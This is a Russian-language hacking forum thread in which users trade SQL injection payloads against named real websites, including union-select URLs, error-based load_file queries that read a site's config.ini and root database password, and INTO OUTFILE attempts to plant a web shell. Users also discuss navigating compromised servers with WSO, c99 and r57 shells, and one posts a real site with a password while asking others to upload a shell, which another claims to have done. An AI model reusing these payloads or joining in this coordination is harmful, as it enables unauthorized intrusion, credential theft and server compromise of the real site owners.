Ваши вопросы по уязвимостям.

shadowrun, попробуй так http://ironmiketyson.ru/article_read.php?id=1+/*!union*/+/*!select*/+1+--+
сам не могу проверить, проксика нет

 

Пошло дело . Спасибо.

 

Можно ли как-то это использовать и куда копать?

 

Для начало поищи другой уязвимый параметр

 

Прошу помощи!

Как всегда начну с фразы: "Уважаемые знатоки!"

Есть сайт:

1)file_priv=y

2)mq=off

3) есть /test.php

3) Доступ 4х администраторов в админку есть, доступ в админку www.site.ru/cms) - так он не пускает но если через www.site.ru/index.php/cms тогда пускает но не выполняются скрипты.

4) прочитан config.ini есть пароль root к базе. Но путь до самой базы не известен.

Теперь самое интересное:

config.ini прочитан так:
index/***/id/*21'+or+1+group+by+concat(mid(load_file(0xздесьхеш),50,163),floor(rand(0)*2))+having+min(0)+or+1+--+

запрос на запись делаем так: /image/*****/id/*53+and+(select+'+into+outfile+')+!=1
результат - ошибка но через пару часов при
/image/*****/id/*53 без инъекта появляется следущее:

яШяаJFIF

HHяб4ExifII*




b

j(

1
r2
Ћi‡
¤шЂь 'Ђь 'Adobe Photoshop CS2 Windows2011:07:05 16:16:46†’Ъ

яя 
Ж 
zLEAD Technologies Inc. V1.01



F


N
(



V

ЦH
H
яШяаJFIF
HHянAdobe_CMяоAdobedЂ
яЫ„   
  яАc 
"

яЭ яД
?







 








 

3
!1AQa"qЃ2‘Ў

и т.д...

ВНИМАНИЕ ВОПРОС!
На сколько высока вероятность то что into outfile не получится (доходчиво: шелл не зальется?)

P.S. возможно не правильный запрос но если запрос сделать так
/image/*****/id/*53+and+'select+'+into+outfile+'+!=1'
то ошибка такова:
Invalid query: File ' !=1' already exists

Спасибо за внимание надеюсь на коментарии, может у кого-то похожая ситуация была.

 

На линьке WSO. Нужно из шелла попасть в одну директорию, но в ней содержится оочень много файлов одного расширения и поэтому, при заходе в директорию отображается пустая страница. Как исправить это недоразумение?
Использовал другие шеллы: с99, r57 и т.д. Результат один и он не устраивает.
Надеюсь вопрос корректно составлен.

 

зайди в консоль(в шелле) ls -lah /путь/до/директории

 

2lion-art по твоим описаниям залить шелл как два пальца об асфальт но...
спали в ПМ линк посмотрю и отпишусь, так как трудно что то тут посоветовать а то за каждый шаг будет плодится еще вопросы.

 

помогите залиться пожалуйста!

http://www.magiccamp.com.ua/
php:vtufgfhjkm

 

Троль! Во первых, те не сказал, что залить, во вторых - ты даже не сказал, где админка. Вот из-за этого не буду тебе давать шелл...

 

Code:

http://www.magiccamp.com.ua/robots.txt

братюнь админку помочь найти?
залить мочой прямо на сервак он просил естессна,не шелл же.


upd:сууука,тролль пишется с двумя л

ууумница=*

 

Ты может троль и с двумя "л", я шелл залил, но ему давать не буду.

P.S robots.txt и без тебя врубить догадался.

 

есть таблица с названием - 5
как удалить оттуда запись с id=4 ?
вот запрос на вывод данных:

но удалить не получается, уже перепробовал всё что можно, например:

что я делаю не так?

 

Goodwin_

где вы читали о данном способе?

 

про удаление? нигде, сам написал.

 

тогда знайте что такое невозможно

 

про delete прочитал вот тут:
http://forum.antichat.ru/thread43966.html

спасибо за ответ.

 

Goodwin_

вышенаписанные операторы существуют, но в данном случий синтаксис вашего запроса неверный